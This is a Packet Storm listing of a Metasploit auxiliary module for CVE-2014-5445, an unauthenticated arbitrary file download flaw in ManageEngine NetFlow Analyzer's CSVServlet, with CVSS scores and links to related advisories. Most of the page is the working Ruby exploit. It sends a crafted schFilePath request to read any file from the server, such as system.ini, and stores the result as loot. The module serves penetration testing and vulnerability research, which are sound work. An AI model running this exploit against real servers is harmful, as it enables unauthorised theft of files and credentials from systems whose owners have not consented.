Lucene search
Pedro Ribeiro, metasploit.comPACKETSTORM:180817HistoryAug 31, 2024 - 12:00 a.m.
ManageEngine NetFlow Analyzer Arbitrary File Download
2024-08-3100:00:00
Pedro Ribeiro, metasploit.com
packetstormsecurity.com
12
manageengine
netflow analyzer
arbitrary file download
csvservlet
windows
linux
cve-2014-5445
osvdb-115340
file download.
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
AI Score
7
Confidence
Low
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'ManageEngine NetFlow Analyzer Arbitrary File Download',
'Description' => %q{
This module exploits an arbitrary file download vulnerability in CSVServlet
on ManageEngine NetFlow Analyzer. This module has been tested on both Windows
and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you
must escape the backslash with a backslash.
},
'Author' => [
'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2014-5445' ],
[ 'OSVDB', '115340' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2014/Dec/9' ],
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]
],
'DisclosureDate' => '2014-11-30'
)
)
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI',
[ true, 'The base path to NetFlow Analyzer', '/netflow' ]),
OptString.new('FILEPATH', [true, 'Path of the file to download', 'C:\\windows\\system.ini']),
]
)
end
def run
# Create request
begin
print_status("Downloading file #{datastore['FILEPATH']}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'),
'vars_get' => { 'schFilePath' => datastore['FILEPATH'] }
})
rescue Rex::ConnectionError
print_error('Could not connect.')
return
end
# Show data if needed
if res && res.code == 200
if res.body.to_s.bytesize == 0
print_error('0 bytes returned, file does not exist or it is empty.')
return
end
vprint_line(res.body.to_s)
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'netflow.http',
'application/octet-stream',
datastore['RHOST'],
res.body,
fname
)
print_good("File saved in: #{path}")
else
print_error('Failed to download file.')
end
end
end
`
Related
cvelist
cvelist
CVE-2014-5445
2014-12-04 17:00:00
nvd
nvd
CVE-2014-5445
2014-12-04 17:59:00
prion
prion
Path traversal
2014-12-04 17:59:00
cve
cve
CVE-2014-5445
2014-12-04 17:59:00
checkpoint_advisories
checkpoint_advisories
metasploit
metasploit
ManageEngine NetFlow Analyzer Arbitrary File Download
2014-11-30 00:12:37
nessus
nessus
ManageEngine NetFlow Analyzer Multiple Path Traversal and File Access
2015-03-16 00:00:00
packetstorm
packetstorm
ManageEngine Netflow Analyzer / IT360 File Download
2014-12-01 00:00:00
securityvulns
securityvulns
NetFlow Analyzer security vulnerabilities
2014-12-01 00:00:00
zdt
zdt
ManageEngine Netflow Analyzer / IT360 File Download Vulnerability
2014-12-02 00:00:00
exploitpack
exploitpack
ManageEngine Netflow Analyzer IT360 - Arbitrary File Download
2014-12-03 00:00:00
zdi
zdi
exploitdb
exploitdb
ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download
2014-12-03 00:00:00
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
AI Score
7
Confidence
Low
Related for PACKETSTORM:180817